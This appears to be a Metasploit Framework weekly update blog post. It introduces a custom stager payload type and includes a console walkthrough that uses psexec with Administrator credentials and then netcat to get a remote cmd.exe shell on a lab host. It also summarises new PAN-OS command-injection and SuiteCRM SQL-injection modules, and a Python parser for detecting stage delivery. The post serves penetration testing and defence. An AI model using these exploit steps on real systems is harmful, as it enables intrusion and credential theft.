Last updated at Fri, 16 Sep 2022 20:09:50 GMT

BYOS: Bring your own stager

We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.

Got a third-party payload you want to run like Sliver or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the shellcode_file option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.

While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory and jump into the shellcode it places in memory.
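As an added example (not code from the post or from Metasploit), here is how a sensor or forensic tool could parse the size-prefixed framing described above when it reconstructs the handler-to-stager TCP stream, so that a complete, truncated, or padded stage can be told apart. The 4-byte little-endian size field is an assumption, since the post does not state the width of the prefix.

```python
import struct

# Assumption: the size is a 4-byte little-endian unsigned int, as in the
# classic Metasploit TCP stager; the post only says "prepend the size".
SIZE_FMT = "<I"
SIZE_LEN = struct.calcsize(SIZE_FMT)

def build_frame(payload: bytes) -> bytes:
    """Frame a blob the way the protocol describes: size, then the bytes.
    Used here only to construct sample captures for the parser below."""
    return struct.pack(SIZE_FMT, len(payload)) + payload

def parse_stage_frame(stream: bytes):
    """Return (declared_size, body, status) for a reconstructed stream.

    status is 'complete' when the declared size matches the bytes that follow,
    'truncated' when the capture ended early, 'extra' when more bytes follow
    than declared, and 'too_short' when even the size field is missing."""
    if len(stream) < SIZE_LEN:
        return None, b"", "too_short"
    declared = struct.unpack(SIZE_FMT, stream[:SIZE_LEN])[0]
    body = stream[SIZE_LEN:]
    if len(body) == declared:
        return declared, body, "complete"
    if len(body) < declared:
        return declared, body, "truncated"
    return declared, body[:declared], "extra"

def looks_like_stage_delivery(stream: bytes, min_size=64,
                              max_size=8 * 1024 * 1024) -> bool:
    """Heuristic for a server-to-client stream: a self-consistent length
    prefix framing a blob of plausible size that is mostly non-text."""
    declared, body, status = parse_stage_frame(stream)
    if status != "complete" or not (min_size <= declared <= max_size):
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in body)
    return printable / len(body) < 0.7  # machine code is rarely mostly ASCII

# Constructed samples (no real shellcode): 505 filler bytes mirror the
# "Sending stage (505 bytes)" line in the console output of this post, and
# the second stream is ordinary text with the same framing for contrast.
SAMPLE_STAGE = build_frame(bytes((i * 37 + 11) & 0xFF for i in range(505)))
SAMPLE_TEXT = build_frame(b"GET / HTTP/1.1\r\nHost: example\r\n\r\n" * 4)
```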

Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                10.5.132.159     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               v3Mpassword      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/x64/custom/reverse_tcp):

   Name            Current Setting          Required  Description
   ----            ---------------          --------  -----------
   EXITFUNC        thread                   yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST           10.5.135.101             yes       The listen address (an interface may be specified)
   LPORT           4567                     yes       The listen port
   SHELLCODE_FILE  x64_shell_bind_4444.bin  no        Shellcode bin to launch


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 10.5.135.101:4567 
[*] 10.5.132.159:445 - Connecting to the server...

<hacking intensifies>

[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500


[*] 10.5.132.159 - Custom session 1 closed.  Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit

Now, we can just open a netcat session to the independent bind shell we started on the target:

[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
   IPv4 Address. . . . . . . . . . . : 10.5.132.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.5.132.1

Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

C:\Windows\system32>

Module added to exploit OS Command Injection in PAN-OS

Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7 introduced a new module that exploits an OS Command Injection vulnerability, CVE-2020-2038, in PAN-OS. The vulnerability affects PAN-OS versions 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS runs one of the leading enterprise firewalls, the Palo Alto Networks next-generation firewall (NGFW). The National Vulnerability Database rates the severity of this vulnerability as high (7.2), since authenticated administrators of the system are able to execute arbitrary commands with root privileges. The cause is that the management API does not sufficiently filter the input of its "op" request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on PT Swarm.

New module content (4)

  • SuiteCRM authenticated SQL injection in export functionality by Exodus Intelligence, Redouane NIBOUCHA, and jheysel-r7 - This adds support for EIP-0f5d2d7f, a vulnerability in the uid parameter of the index.php?entryPoint=export page on SuiteCRM 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes of SuiteCRM users, which can then be cracked offline to gain access to SuiteCRM.

  • Palo Alto Networks Authenticated Remote Code Execution by Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7, which exploits CVE-2020-2038 - This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface, versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and versions 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.

  • #16521 from bwatters-r7 - This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.

  • #16906 from bcoles - This improves the post/windows/gather/enum_snmp module with shell and PowerShell session support, and fixes issues that low-privileged sessions would run into while reading the registry.

Enhancements and features (5)

  • #16911 from bcoles - This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the post/windows/gather/enum_ms_product_keys module.
  • #16929 from bcoles - The post/windows/gather/enum_services module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module.
  • #16930 from bcoles - This updates the scripts/resource/dev_checks.rc resource script to fix issues and add additional module checks.
  • #16953 from bcoles - The enum_domain script has been updated to support PowerShell and shell sessions, and its documentation and code have been cleaned up.
  • #17008 from EmilioPanti - rpc_core.rb has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn't being reported, whilst other statistics like number of exploit modules, auxiliary modules, and payloads were.

Bugs fixed (5)

  • #16928 from bcoles - Multiple bugs have been fixed in the Msf::Post::Windows::Service mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent.
  • #16998 from adfoster-r7 - Fixes a crash in modules using the IAX2 client.
  • #17013 from zeroSteiner - This PR enhances exploit/multi/http/jenkins_script_console to handle changes to the login process for Jenkins newer than version 2.246.
  • #17014 from adfoster-r7 - This fixes the exploit/multi/php/ignition_laravel_debug_rce module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections.
  • #17018 from adfoster-r7 - This fixes the route add command to use a sensible default netmask.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).